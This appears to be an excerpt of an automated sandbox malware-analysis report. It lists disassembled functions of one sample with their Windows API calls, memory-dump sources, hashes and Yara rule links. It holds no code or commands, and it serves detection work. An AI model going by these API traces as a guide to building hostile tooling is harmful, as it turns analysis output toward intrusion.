                                                                                                                            • Instruction Fuzzy Hash: 80514C35E00619EFCF15EF64C845AAEBBB4EF48720F144069E852BB351CB74AE41EB94
                                                                                                                            Function 00F3EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00F3EF06
                                                                                                                            • VariantClear.OLEAUT32(00000013), ref: 00F3EF78
                                                                                                                            • VariantClear.OLEAUT32(00000000), ref: 00F3EFD3
                                                                                                                            • _memmove.LIBCMT ref: 00F3EFFD
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00F3F04A
                                                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F3F078
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1101466143-0
                                                                                                                            • Opcode ID: 43e7c511acbc2e6a23956595a7d3bbbb2218d49b972ff746500cc560e19fb0e0
                                                                                                                            • Instruction ID: 013ddd42e4c2a50eae4ef99a02398dc89c0cb0ffe3b9b1f6edf45a8122f6922f
                                                                                                                            • Opcode Fuzzy Hash: 43e7c511acbc2e6a23956595a7d3bbbb2218d49b972ff746500cc560e19fb0e0
                                                                                                                            • Instruction Fuzzy Hash: 0C5169B5A00209EFCB14CF58D880AAAB7B8FF4C324F158569E959DB345E734E915CFA0
                                                                                                                            Function 00F4220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00F42258
                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F422A3
                                                                                                                            • IsMenu.USER32(00000000), ref: 00F422C3
                                                                                                                            • CreatePopupMenu.USER32 ref: 00F422F7
                                                                                                                            • GetMenuItemCount.USER32(000000FF), ref: 00F42355
                                                                                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00F42386
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3311875123-0
                                                                                                                            • Opcode ID: 08ae0f17073fcbe68f00e357d06e199378523ebb9eeed078b3480a9d0f372b0c
                                                                                                                            • Instruction ID: 25d0836af7fc47371edcbd3a289ce8554013793c9a98149222c114269c506eb4
                                                                                                                            • Opcode Fuzzy Hash: 08ae0f17073fcbe68f00e357d06e199378523ebb9eeed078b3480a9d0f372b0c
                                                                                                                            • Instruction Fuzzy Hash: 4051AC30A00209DBDF61CF68D888BAEBFF5AF45324F548139FC15A7290D3B89944EB51
                                                                                                                            Function 00EE1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE2612: GetWindowLongW.USER32(?,000000EB), ref: 00EE2623
                                                                                                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 00EE179A
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00EE17FE
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00EE181B
                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00EE182C
                                                                                                                            • EndPaint.USER32(?,?), ref: 00EE1876
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1827037458-0
                                                                                                                            • Opcode ID: a288f7687f028f5546d9b26704e92b1e63f48cb4b8801fb1938a0645502d0fec
                                                                                                                            • Instruction ID: a013c75997eaed2bb8a65ac807adf3c0913b36816891ea6176f6a11552532a6b
                                                                                                                            • Opcode Fuzzy Hash: a288f7687f028f5546d9b26704e92b1e63f48cb4b8801fb1938a0645502d0fec
                                                                                                                            • Instruction Fuzzy Hash: 4041CF70504348EFC710DF25DC84FBA7BE8EB4AB24F044269F9A4972B1C7719885EB62
                                                                                                                            Function 00F6B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ShowWindow.USER32(00FA57B0,00000000,01205408,?,?,00FA57B0,?,00F6B5A8,?,?), ref: 00F6B712
                                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00F6B736
                                                                                                                            • ShowWindow.USER32(00FA57B0,00000000,01205408,?,?,00FA57B0,?,00F6B5A8,?,?), ref: 00F6B796
                                                                                                                            • ShowWindow.USER32(00000000,00000004,?,00F6B5A8,?,?), ref: 00F6B7A8
                                                                                                                            • EnableWindow.USER32(00000000,00000001), ref: 00F6B7CC
                                                                                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00F6B7EF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 642888154-0
                                                                                                                            • Opcode ID: 4a04f3dfd81d64e8ac5163ea9315c3a2d3aaf5774dbdee4ff5369f45d5db83f3
                                                                                                                            • Instruction ID: 0e90560ea3499f43a318dade89a7d5f23d6aaf5ec0aa6fd9ce12db88904e591a
                                                                                                                            • Opcode Fuzzy Hash: 4a04f3dfd81d64e8ac5163ea9315c3a2d3aaf5774dbdee4ff5369f45d5db83f3
                                                                                                                            • Instruction Fuzzy Hash: D041A334A00254EFDB22CF24D499B947BE1FF45321F1842B9F958CF6A2C771A896EB50
                                                                                                                            Function 00F5709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,00F54E41,?,?,00000000,00000001), ref: 00F570AC
                                                                                                                              • Part of subcall function 00F539A0: GetWindowRect.USER32(?,?), ref: 00F539B3
                                                                                                                            • GetDesktopWindow.USER32 ref: 00F570D6
                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00F570DD
                                                                                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00F5710F
                                                                                                                              • Part of subcall function 00F45244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F452BC
                                                                                                                            • GetCursorPos.USER32(?), ref: 00F5713B
                                                                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F57199
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4137160315-0
                                                                                                                            • Opcode ID: 864bd62b2b18ad66cdc264b57925bbf3966b854b9bfb3039c26c6a97ba7e6d62
                                                                                                                            • Instruction ID: ddca870a545732ff809b188edbc9ab471eb2007f088194b2f07956f872ce68d9
                                                                                                                            • Opcode Fuzzy Hash: 864bd62b2b18ad66cdc264b57925bbf3966b854b9bfb3039c26c6a97ba7e6d62
                                                                                                                            • Instruction Fuzzy Hash: 4A31F472508309ABC720EF14DC49B5BBBA9FF88314F000519F99597191C774EE08DB92
                                                                                                                            Function 00F38879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F380A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F380C0
                                                                                                                              • Part of subcall function 00F380A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F380CA
                                                                                                                              • Part of subcall function 00F380A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F380D9
                                                                                                                              • Part of subcall function 00F380A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F380E0
                                                                                                                              • Part of subcall function 00F380A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F380F6
                                                                                                                            • GetLengthSid.ADVAPI32(?,00000000,00F3842F), ref: 00F388CA
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F388D6
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00F388DD
                                                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00F388F6
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00F3842F), ref: 00F3890A
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00F38911
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3008561057-0
                                                                                                                            • Opcode ID: 6794622bbf95db263d1c248f5b85ff66e69120ecd6315ebb63b527b30979f4ab
                                                                                                                            • Instruction ID: 6faae9905540d407eb2f300d4ed642b9ec4bd7f3e71d59a99fcd21b18a1aa710
                                                                                                                            • Opcode Fuzzy Hash: 6794622bbf95db263d1c248f5b85ff66e69120ecd6315ebb63b527b30979f4ab
                                                                                                                            • Instruction Fuzzy Hash: 4E11AF72902209FFDB109FA4DC09BBE7B68FB453A5F104028F89597111CB7A9906EB60
                                                                                                                            Function 00F385B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F385E2
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00F385E9
                                                                                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00F385F8
                                                                                                                            • CloseHandle.KERNEL32(00000004), ref: 00F38603
                                                                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F38632
                                                                                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00F38646
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1413079979-0
                                                                                                                            • Opcode ID: f0306dbe4ad176a3e26df8ddf8bea7ff39729974ed032f70c69a350cfb9b331e
                                                                                                                            • Instruction ID: fc62717b2a12a851ee215e4b54cf19554dba927e2bff4da3b3af6e1bccfabf47
                                                                                                                            • Opcode Fuzzy Hash: f0306dbe4ad176a3e26df8ddf8bea7ff39729974ed032f70c69a350cfb9b331e
                                                                                                                            • Instruction Fuzzy Hash: 1A116A7250020DABDF018FA4ED49FDE7BA9EF08364F044064FE05A2160C7B68D65EB60
                                                                                                                            Function 00F3B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(00000000), ref: 00F3B7B5
                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F3B7C6
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F3B7CD
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00F3B7D5
                                                                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F3B7EC
                                                                                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 00F3B7FE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CapsDevice$Release
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1035833867-0
                                                                                                                            • Opcode ID: a59d9a01f9fe5b2b9fb19885baefa45f8c5396b62a7891a748e7bcb69c51c538
                                                                                                                            • Instruction ID: eedc1a029df1fbd508a1548887dc424e3602c26a62e0572f5aed8de311bbae4b
                                                                                                                            • Opcode Fuzzy Hash: a59d9a01f9fe5b2b9fb19885baefa45f8c5396b62a7891a748e7bcb69c51c538
                                                                                                                            • Instruction Fuzzy Hash: A90184B5E00309BBEB109BA6DD45A5EBFB8EB48361F004075FA04E7391D6719C10DF90
                                                                                                                            Function 00F00162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F00193
                                                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00F0019B
                                                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F001A6
                                                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F001B1
                                                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00F001B9
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F001C1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4278518827-0
                                                                                                                            • Opcode ID: 9a1cd249ea6b78497dbe4fd0efa69144246ed6945068ccd3abac48d35b843542
                                                                                                                            • Instruction ID: ad7bce91a1c3dfed5a9f837cc8bf6ce390385f7673230e0b1792d4b06deb739e
                                                                                                                            • Opcode Fuzzy Hash: 9a1cd249ea6b78497dbe4fd0efa69144246ed6945068ccd3abac48d35b843542
                                                                                                                            • Instruction Fuzzy Hash: F3016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BE15C47941C7F5A868CBE5
                                                                                                                            Function 00F453E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F453F9
                                                                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F4540F
                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00F4541E
                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F4542D
                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F45437
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F4543E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 839392675-0
                                                                                                                            • Opcode ID: ba6802b3620d15c30e85554ff6b3faef275de388f855d68905258d978e30b267
                                                                                                                            • Instruction ID: 6963ed20177429896414d59e217fdef1946e82ba1ee7016029ec557b6f05ed6e
                                                                                                                            • Opcode Fuzzy Hash: ba6802b3620d15c30e85554ff6b3faef275de388f855d68905258d978e30b267
                                                                                                                            • Instruction Fuzzy Hash: 45F06D3224015CBBE3205BA2EC0EEAB7E7CEBC7B11F000169FA14D106196E11A05A6B5
                                                                                                                            Function 00F47230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 00F47243
                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,00EF0EE4,?,?), ref: 00F47254
                                                                                                                            • TerminateThread.KERNEL32(00000000,000001F6,?,00EF0EE4,?,?), ref: 00F47261
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00EF0EE4,?,?), ref: 00F4726E
                                                                                                                              • Part of subcall function 00F46C35: CloseHandle.KERNEL32(00000000,?,00F4727B,?,00EF0EE4,?,?), ref: 00F46C3F
                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F47281
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00EF0EE4,?,?), ref: 00F47288
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3495660284-0
                                                                                                                            • Opcode ID: e7e56854c7707a9dc4fc7da3a90d1dda96b94c417c5799776055443a2d2a52e7
                                                                                                                            • Instruction ID: 5836106a8788e392e896cff4f479dbbadef55abb49f4d563b4c04b1be9023f4f
                                                                                                                            • Opcode Fuzzy Hash: e7e56854c7707a9dc4fc7da3a90d1dda96b94c417c5799776055443a2d2a52e7
                                                                                                                            • Instruction Fuzzy Hash: A9F0BE36444206EBD7112B24FC8C9DA7B29FF06312B000231F603900A0CBF61804EF50
                                                                                                                            Function 00F38992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F3899D
                                                                                                                            • UnloadUserProfile.USERENV(?,?), ref: 00F389A9
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00F389B2
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00F389BA
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00F389C3
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00F389CA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 146765662-0
                                                                                                                            • Opcode ID: a2dd3e03ef27e7eb7ff2bad6393ff92a6f0bdb00e72fdb2c3f67f9e8dd014aca
                                                                                                                            • Instruction ID: aa4c2a058a767c17f51b2c1fb629df8a10729c39c9e33fe53c9570e20f9edf35
                                                                                                                            • Opcode Fuzzy Hash: a2dd3e03ef27e7eb7ff2bad6393ff92a6f0bdb00e72fdb2c3f67f9e8dd014aca
                                                                                                                            • Instruction Fuzzy Hash: CAE0C236004009FBDA011FE1FC0C90ABB69FB8A362B108230F22981170CBB29428EB50
                                                                                                                            Function 00F585ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00F58613
                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00F58722
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00F5889A
                                                                                                                              • Part of subcall function 00F47562: VariantInit.OLEAUT32(00000000), ref: 00F475A2
                                                                                                                              • Part of subcall function 00F47562: VariantCopy.OLEAUT32(00000000,?), ref: 00F475AB
                                                                                                                              • Part of subcall function 00F47562: VariantClear.OLEAUT32(00000000), ref: 00F475B7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
